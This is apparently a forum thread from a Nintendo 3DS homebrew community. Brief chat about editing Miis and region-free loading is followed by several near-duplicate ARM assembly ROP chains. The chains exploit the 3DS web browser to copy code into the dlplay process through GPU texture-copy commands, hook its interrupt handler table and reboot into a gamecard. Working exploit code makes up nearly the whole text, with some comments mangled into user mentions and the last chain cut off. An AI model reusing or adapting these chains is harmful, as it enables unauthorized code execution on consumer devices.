It would be nice if a Gold Pants Mii could be used through this exploit, surely I could help many friends in our meet-ups. Someone mentioned this should be possible, yesterday, at this same thread, iirc...
...
It would be nice if a Gold Pants Mii could be used through this exploit, surely I could help many friends in our meet-ups. Someone mentioned this should be possible, yesterday, at this same thread, iirc...
It would be nice if a Gold Pants Mii could be used through this exploit, surely I could help many friends in our meet-ups. Someone mentioned this should be possible, yesterday, at this same thread, iirc...
It would be nice if a Gold Pants Mii could be used through this exploit, surely I could help many friends in our meet-ups. Someone mentioned this should be possible, yesterday, at this same thread, iirc...
I think it would be able to,Since this exploit digs in ram and changes it
Miis seems to be on extdata but not on SD.Miis are stored on the SD, and are possible to change via extData.
Oh? I could have swore, but I'm sure you're right.Miis seems to be on extdata but not on SD.
I'll try to do so today as soon as LoadCode parameter passing to code will be fixed. But are you sure you need it, it is the same regionthree but with no ROP/Launcher.DAT file on the SD.Could someone perhaps compile https://github.com/yifanlu/Spider3DSTools/wiki/RegionThree-Loading please maybe duke_srg could?
duke_srg
I'll try to do so today as soon as LoadCode parameter passing to code will be fixed. But are you sure you need it, it is the same regionthree but with no ROP/Launcher.DAT file on the SD.
Yes it will be a bit easier. I also will check code loading from site and injecting to the web partpayload, as it seems no one knows the ROP size limitWell it's just easier and would be nice as it could also add compatibility considering its not launching files on an SD Card and its using a different exploit
EDIT: Also my anti virus blocks your website for some reason
Yes it will be a bit easier. I also will check code loading from site and injecting to the web partpayload, as it seems no one knows the ROP size limit
Which page? Anyway blame your paranoid mode antivirus
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word SPIDER_ROP_LOC+0x8C @ r0 (garbage)
.word 0xDEADC0DE @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word SPIDER_ROP_LOC @ r4 (needed for rop)
.word 0x001057C4 @ r5 (needed for rop)
.word 0x001057C4 @ r6 (needed for rop)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word 0xDEADC0DE @ r0 (garbage)
.word 0xDEADC0DE @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0x0010C2FC @ r4 (needed for rop)
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop)
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word 0xDEADC0DE @ r0 (garbage)
.word 0x001057C4 @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ needed for ROP
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
myself:
.word SPIDER_ROP_LOC+myself
.word 0x001057C4
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0x00130344
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00130344 @ unused
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@ needed for ROP
.word 0x0010C2FC @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x001057C4 @ r10 (needed for rop) InitData 3
.word 0x001057C4 @ POP {PC} (needed for rop) InitData 4
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x0010C2FC @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x001057C4 @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x00130344 @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B47400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0029C170 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0029BF64 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x002AD574 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00269758 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002A513C @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x002AD574 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00269758 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002A513C @ svc 0xa | bx lr
@ needed for ROP
.word 0x002AD574 @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0029C170 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0029BF64 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x0010DB6C @ r10 (needed for rop) InitData 3
.word 0x0010DB6C @ POP {PC} (needed for rop) InitData 4
[USER=273536]flush[/USER] data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x002AD574 @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x0010DB6C @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x002D6A1C @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B85400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0012A3D4 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B5C @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
